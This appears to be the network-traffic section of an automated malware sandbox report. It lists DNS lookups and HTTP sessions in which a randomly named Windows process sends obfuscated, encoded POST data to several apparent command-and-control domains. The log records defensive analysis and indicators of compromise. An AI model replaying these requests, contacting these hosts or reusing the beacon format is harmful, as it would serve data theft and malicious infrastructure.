Dec 9, 2024 13:14:29.924721956 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:29.924896002 CET	80	49819	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:29.924954891 CET	49819	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:30.282572031 CET	49819	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:31.300621033 CET	49827	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:31.420195103 CET	80	49827	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:31.420274019 CET	49827	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:31.429249048 CET	49827	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:31.548719883 CET	80	49827	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:32.580806017 CET	80	49827	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:32.580997944 CET	80	49827	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:32.581101894 CET	80	49827	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:32.581125975 CET	49827	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:32.581154108 CET	49827	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:32.583406925 CET	49827	80	192.168.2.4	108.181.189.7
Dec 9, 2024 13:14:32.702591896 CET	80	49827	108.181.189.7	192.168.2.4
Dec 9, 2024 13:14:37.888876915 CET	49843	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:38.008280993 CET	80	49843	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:38.011683941 CET	49843	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:38.024017096 CET	49843	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:38.144583941 CET	80	49843	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:39.171000957 CET	80	49843	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:39.171014071 CET	80	49843	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:39.171086073 CET	49843	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:39.532522917 CET	49843	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:40.550657988 CET	49849	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:40.670080900 CET	80	49849	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:40.670172930 CET	49849	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:40.681565046 CET	49849	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:40.801137924 CET	80	49849	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:41.768484116 CET	80	49849	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:41.768595934 CET	80	49849	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:41.768649101 CET	49849	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:42.189090014 CET	49849	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:43.207334995 CET	49855	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:43.326663017 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:43.326759100 CET	49855	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:43.341212988 CET	49855	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:43.460680008 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:43.460694075 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:43.460736990 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:43.460773945 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:43.460860968 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:43.460874081 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:43.460933924 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:43.460952044 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:43.461004972 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:44.426273108 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:44.469995975 CET	49855	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:44.489345074 CET	80	49855	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:44.489402056 CET	49855	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:44.846292019 CET	49855	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:45.863405943 CET	49861	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:45.982760906 CET	80	49861	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:45.982834101 CET	49861	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:45.991956949 CET	49861	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:46.111681938 CET	80	49861	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:47.088577032 CET	80	49861	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:47.088735104 CET	80	49861	13.248.169.48	192.168.2.4
Dec 9, 2024 13:14:47.088788033 CET	49861	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:47.091223001 CET	49861	80	192.168.2.4	13.248.169.48
Dec 9, 2024 13:14:47.210541010 CET	80	49861	13.248.169.48	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 13:14:05.700582027 CET	65454	53	192.168.2.4	1.1.1.1
Dec 9, 2024 13:14:06.568362951 CET	53	65454	1.1.1.1	192.168.2.4
Dec 9, 2024 13:14:22.910505056 CET	58548	53	192.168.2.4	1.1.1.1
Dec 9, 2024 13:14:23.310520887 CET	53	58548	1.1.1.1	192.168.2.4
Dec 9, 2024 13:14:37.597974062 CET	51454	53	192.168.2.4	1.1.1.1
Dec 9, 2024 13:14:37.886626005 CET	53	51454	1.1.1.1	192.168.2.4
Dec 9, 2024 13:14:52.103662014 CET	54701	53	192.168.2.4	1.1.1.1
Dec 9, 2024 13:14:52.562109947 CET	53	54701	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 13:14:05.700582027 CET	192.168.2.4	1.1.1.1	0x50ee	Standard query (0)	www.bloodbalancecaps.shop	A (IP address)	IN (0x0001)	false
Dec 9, 2024 13:14:22.910505056 CET	192.168.2.4	1.1.1.1	0xfba7	Standard query (0)	www.jalan2.online	A (IP address)	IN (0x0001)	false
Dec 9, 2024 13:14:37.597974062 CET	192.168.2.4	1.1.1.1	0x8db8	Standard query (0)	www.avalanchefi.xyz	A (IP address)	IN (0x0001)	false
Dec 9, 2024 13:14:52.103662014 CET	192.168.2.4	1.1.1.1	0x4757	Standard query (0)	www.02760.wang	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 13:14:06.568362951 CET	1.1.1.1	192.168.2.4	0x50ee	No error (0)	www.bloodbalancecaps.shop	bloodbalancecaps.shop		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 13:14:06.568362951 CET	1.1.1.1	192.168.2.4	0x50ee	No error (0)	bloodbalancecaps.shop		108.179.253.197	A (IP address)	IN (0x0001)	false
Dec 9, 2024 13:14:23.310520887 CET	1.1.1.1	192.168.2.4	0xfba7	No error (0)	www.jalan2.online	jalan2.online		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 13:14:23.310520887 CET	1.1.1.1	192.168.2.4	0xfba7	No error (0)	jalan2.online		108.181.189.7	A (IP address)	IN (0x0001)	false
Dec 9, 2024 13:14:37.886626005 CET	1.1.1.1	192.168.2.4	0x8db8	No error (0)	www.avalanchefi.xyz		13.248.169.48	A (IP address)	IN (0x0001)	false
Dec 9, 2024 13:14:37.886626005 CET	1.1.1.1	192.168.2.4	0x8db8	No error (0)	www.avalanchefi.xyz		76.223.54.146	A (IP address)	IN (0x0001)	false
Dec 9, 2024 13:14:52.562109947 CET	1.1.1.1	192.168.2.4	0x4757	Server failure (2)	www.02760.wang	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.bloodbalancecaps.shop

www.jalan2.online

www.avalanchefi.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49763	108.179.253.197	80	3752	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 13:14:06.703543901 CET	549	OUT	GET /7n6c/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.bloodbalancecaps.shop Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Dec 9, 2024 13:14:07.877156019 CET	565	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 09 Dec 2024 12:14:07 GMT Server: nginx/1.23.4 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://bloodbalancecaps.shop/7n6c/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y= X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49804	108.181.189.7	80	3752	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 13:14:23.447290897 CET	803	OUT	POST /xu9o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.jalan2.online Origin: http://www.jalan2.online Referer: http://www.jalan2.online/xu9o/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 64 49 6c 54 76 45 38 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 5a 61 44 49 36 54 53 62 6c 71 66 57 73 56 72 4b 54 35 74 77 69 59 35 5a 30 39 7a 72 57 36 2b 51 66 54 78 4e 72 72 51 75 58 39 56 63 64 45 51 33 4c 4a 77 6e 38 36 78 35 55 56 74 4c 63 55 45 42 68 61 4c 6a 47 6e 77 6c 4d 72 30 69 4c 55 74 43 75 4a 4a 66 56 6c 57 33 4e 74 46 67 58 31 64 74 56 47 6f 30 2b 71 61 48 56 42 4b 6b 6a 38 52 6f 63 52 31 69 53 52 55 62 68 4b 69 4f 70 39 35 56 46 70 38 7a 69 49 6b 72 6d 49 7a 34 36 52 52 30 53 6f 48 6b 56 4c 52 52 4b 56 41 71 30 48 58 4e 74 34 4a 72 70 75 39 61 73 63 74 75 50 4e 48 68 7a 77 2f 67 55 67 3d 3d Data Ascii: gdIlTvE8=V36Hnmii79e6ZaDI6TSblqfWsVrKT5twiY5Z09zrW6+QfTxNrrQuX9VcdEQ3LJwn86x5UVtLcUEBhaLjGnwlMr0iLUtCuJJfVlW3NtFgX1dtVGo0+qaHVBKkj8RocR1iSRUbhKiOp95VFp8ziIkrmIz46RR0SoHkVLRRKVAq0HXNt4Jrpu9asctuPNHhzw/gUg==
Dec 9, 2024 13:14:24.613518953 CET	279	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Mon, 09 Dec 2024 12:14:24 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Dec 9, 2024 13:14:24.613967896 CET	713	IN	Data Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e Data Ascii: 2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49810	108.181.189.7	80	3752	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 13:14:26.106379032 CET	823	OUT	POST /xu9o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.jalan2.online Origin: http://www.jalan2.online Referer: http://www.jalan2.online/xu9o/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 64 49 6c 54 76 45 38 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 4c 72 7a 49 34 31 61 62 77 61 66 56 6a 31 72 4b 61 5a 74 38 69 59 31 5a 30 2f 44 37 57 70 57 51 52 54 42 4e 36 5a 6f 75 51 39 56 63 57 6b 51 79 57 5a 77 75 38 36 39 48 55 51 56 4c 63 55 67 42 68 66 33 6a 42 55 6f 6d 50 62 30 67 53 45 74 41 7a 35 4a 66 56 6c 57 33 4e 75 35 47 58 31 56 74 56 58 59 30 2f 4c 61 45 54 78 4b 6a 31 73 52 6f 59 52 31 6d 53 52 56 49 68 4a 6d 6f 70 2f 42 56 46 6f 4d 7a 6a 5a 6b 6b 74 49 79 39 30 78 52 68 63 4c 79 78 51 70 73 53 45 44 55 4f 7a 45 54 56 6c 65 45 78 34 66 63 4e 2b 63 4a 64 53 4b 4f 56 2b 7a 43 70 50 73 76 65 4c 7a 64 4f 31 38 69 4b 4f 30 38 31 61 43 49 6f 34 59 45 3d Data Ascii: gdIlTvE8=V36Hnmii79e6LrzI41abwafVj1rKaZt8iY1Z0/D7WpWQRTBN6ZouQ9VcWkQyWZwu869HUQVLcUgBhf3jBUomPb0gSEtAz5JfVlW3Nu5GX1VtVXY0/LaETxKj1sRoYR1mSRVIhJmop/BVFoMzjZkktIy90xRhcLyxQpsSEDUOzETVleEx4fcN+cJdSKOV+zCpPsveLzdO18iKO081aCIo4YE=
Dec 9, 2024 13:14:27.263535976 CET	279	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Mon, 09 Dec 2024 12:14:27 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Dec 9, 2024 13:14:27.263582945 CET	713	IN	Data Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e Data Ascii: 2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49819	108.181.189.7	80	3752	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 13:14:28.777446032 CET	10905	OUT	POST /xu9o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.jalan2.online Origin: http://www.jalan2.online Referer: http://www.jalan2.online/xu9o/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 64 49 6c 54 76 45 38 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 4c 72 7a 49 34 31 61 62 77 61 66 56 6a 31 72 4b 61 5a 74 38 69 59 31 5a 30 2f 44 37 57 76 4f 51 52 67 4a 4e 6f 4f 38 75 52 39 56 63 56 6b 51 7a 57 5a 78 75 38 2b 5a 4c 55 51 51 38 63 57 49 42 69 36 37 6a 41 6c 6f 6d 59 72 30 67 64 6b 74 44 75 4a 4a 4b 56 6c 47 72 4e 74 42 47 58 31 56 74 56 55 41 30 37 61 61 45 49 78 4b 6b 6a 38 52 61 63 52 30 44 53 52 63 39 68 49 53 65 75 50 68 56 46 49 63 7a 68 72 63 6b 67 49 79 2f 33 78 51 6b 63 4c 76 68 51 70 67 34 45 44 49 77 7a 44 62 56 6d 72 78 6f 67 4d 6f 78 6a 75 68 51 4f 62 7a 30 33 79 53 61 50 4e 48 46 4f 57 42 58 33 39 61 71 4c 45 31 59 4f 67 59 32 72 75 67 75 68 42 39 70 44 63 31 35 37 38 45 5a 48 43 63 58 71 74 53 73 4e 33 77 36 51 39 44 79 4d 6b 6e 55 43 2b 4b 76 52 30 74 45 39 74 46 42 78 64 71 6c 64 2f 36 4f 59 69 5a 30 78 71 33 67 2f 6b 32 79 38 73 49 41 56 50 78 41 41 50 49 65 72 35 59 2f 67 74 30 55 75 57 77 33 38 69 2f 31 39 57 75 34 35 45 48 47 66 43 52 43 4f 58 2b 38 65 64 58 4c 45 [TRUNCATED] Data Ascii: gdIlTvE8=V36Hnmii79e6LrzI41abwafVj1rKaZt8iY1Z0/D7WvOQRgJNoO8uR9VcVkQzWZxu8+ZLUQQ8cWIBi67jAlomYr0gdktDuJJKVlGrNtBGX1VtVUA07aaEIxKkj8RacR0DSRc9hISeuPhVFIczhrckgIy/3xQkcLvhQpg4EDIwzDbVmrxogMoxjuhQObz03ySaPNHFOWBX39aqLE1YOgY2ruguhB9pDc1578EZHCcXqtSsN3w6Q9DyMknUC+KvR0tE9tFBxdqld/6OYiZ0xq3g/k2y8sIAVPxAAPIer5Y/gt0UuWw38i/19Wu45EHGfCRCOX+8edXLEzu/C81bJVJFpRVk2OtJchTxTm8p+8cn6YliGAP9FnkgmK2FumdF26Ubjfmwffu/DHoZ/Vxp0Z+ORH8akdwTApMk3BJ2tED6eadtPx4DYS4aF05v4W0j2dSk8r/VgbV25lC4ZjPhTEMVQSKMVVtPIaNNNb4H79VOYD2WoEodhIG2TaY26lA4u5w35jQ4Y8OFcX6YsfE8IMQimhvUNI+oRok3zSdj226gpaPKxETKD/oTeXQ4cnpCGvrXqdUu5yUM4B7YDRKmZazML6tazfClnWri1ycruVENOdQcy70AdhELCwvGhH4wOtAJU7FQrgqU6lh9Azsd4lpnKHApm+GtwRCXXkiEdoAVqs6nA8/EiBW6HZfUIqx6ok0zyNqG0pzzkZRxkTr/bG5wcbt/FHEZSlb7ZNF+uDNlHDrRt04ZfXps2M4ryzMdTMcxvIpUVaJexc58eeltcRHctafiMYkjilEABdvgq4rMxAHvaa5YvxVnGmNVSKJwtu88OXGTbR2MrTaowCyrW5W0hnGFfkD9IRMInSQzxH1kV8spMgVlOqqufG1gMlXxE/4WWeOnxLJCJmbOXrRrm6fuIVCqlniKJKbVP/9JDgKukTjFZ0dmytlQa+2ZLFqNhNFmsxM4CPxbYenh7yMP6urDr0XRDfekclmgbSW2Ld0JVwl [TRUNCATED]
Dec 9, 2024 13:14:29.924721956 CET	987	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Mon, 09 Dec 2024 12:14:29 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 [TRUNCATED] Data Ascii: a2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C\|>&"%dgbtgct\]9B$@%rfUR0l(N2)= lMh<Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$NhuB+c9>(:.+v6IW`l2xcxz+:}_-ohWvT$dm47/kDa-4_Jt] %6$YvLi>Fj3bC{.~p/+a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49827	108.181.189.7	80	3752	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 13:14:31.429249048 CET	541	OUT	GET /xu9o/?gdIlTvE8=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&FH1D=O4FXjFCpJjRpaxv HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.jalan2.online Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Dec 9, 2024 13:14:32.580806017 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 1249 date: Mon, 09 Dec 2024 12:14:32 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
Dec 9, 2024 13:14:32.580997944 CET	224	IN	Data Raw: 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49843	13.248.169.48	80	3752	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 13:14:38.024017096 CET	809	OUT	POST /ctta/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.avalanchefi.xyz Origin: http://www.avalanchefi.xyz Referer: http://www.avalanchefi.xyz/ctta/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 64 49 6c 54 76 45 38 3d 32 31 4a 4e 4c 4c 52 36 6e 57 4c 77 78 77 6f 46 73 7a 6c 46 6f 47 6d 43 66 4a 35 68 31 73 50 56 34 52 30 70 58 49 61 6b 31 64 4d 34 55 